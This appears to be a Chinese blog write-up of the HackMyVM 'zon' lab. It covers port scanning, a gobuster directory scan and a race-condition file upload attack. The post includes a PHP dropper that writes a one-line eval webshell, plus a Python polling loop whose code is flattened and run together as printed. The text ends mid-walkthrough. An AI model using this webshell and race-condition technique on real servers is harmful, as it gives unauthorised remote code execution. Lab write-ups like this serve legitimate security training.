当前位置：首页 > news >正文

hackmyvm靶场--zon

news 2025/9/14 11:51:30

环境

攻击机kali

在这里插入图片描述

靶机

未知

主机探测

因为在同一个局域网内使用ARP协议探测存活主机

在这里插入图片描述

靶机为192.168.56.128

端口探测

在这里插入图片描述

常见的80和22端口

那么一定是寻找web漏洞拿shell了

后台扫描

后台扫描常用dirsearch和gobuster,有时候小字典可能不太行，可以尝试换个大点的字典试试


gobuster dir -w /var/www/html/dict/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.128 -t 200 -x php,zip,jsp,asp,bak,jpg,png,mp4,mkv,txt,html,md,git,7z,rar,db,log,docx,xlsx -b 400-404,500

在这里插入图片描述

扫出一个后台目录choose.php，并且发现了uploads目录，猜测是文件上传

在这里插入图片描述

发现需要上传zip文件，里面是jpeg文件

先上传个正常的

在这里插入图片描述

查看一下uploads目录
在这里插入图片描述

可以正常访问

想要利用文件上传来拿到shell无非需要满足两个条件

1、成功上传木马文件

2、服务端可以解析该文件

这时，我们上传一个php的木马试试，我的压缩包里面放了一个php文件

在这里插入图片描述

结果显示给文件不是jpeg，会被删除

删除两个字，哈哈，让我想到了文件上传的常见考点–条件竞争

我们猜测服务器处理php文件是这样的，当我们在浏览器点击上传键的时候，服务器会先把文件上传到一个目录下，此靶机就是前面找到的uploads目录，然后服务器的脚本代码会对文件的后缀名进行检查，若不是jpeg，那么就会删除，而条件竞争就是利用服务器判断的间隙访问木马文件，在此间隙中，木马已经在服务器中，只不过还来不及判断删除就被我们访问到了，具体的知识涉及到多线程。

实现步骤：

首先准备create-shell.php这个炮灰shell文件,里面写一下代码

<?php fwrite(fopen('shell.php','w'),'<?php @eval($_POST[11]);?>');?>

开启一个访问的Python脚本，作用为验证shell是否成功上传


import requestsurl1 = "http://127.0.0.1/upload/upload/create-shell.php"    # 定义访问 creat-shell.php
url2 = "http://127.0.0.1/upload/upload/shell.php"   
# 定义访问 shell.phpwhile True:  # 定义死循环html1 = requests.get(url1)  # 请求 create-shell.phphtml2 = requests.get(url2)  # 请求 shell.phpif html2.status_code == 200:  # 如果 shell.php 返回的http状态码为200print('Good job,Win Win Win')  # 打印 Good job.....break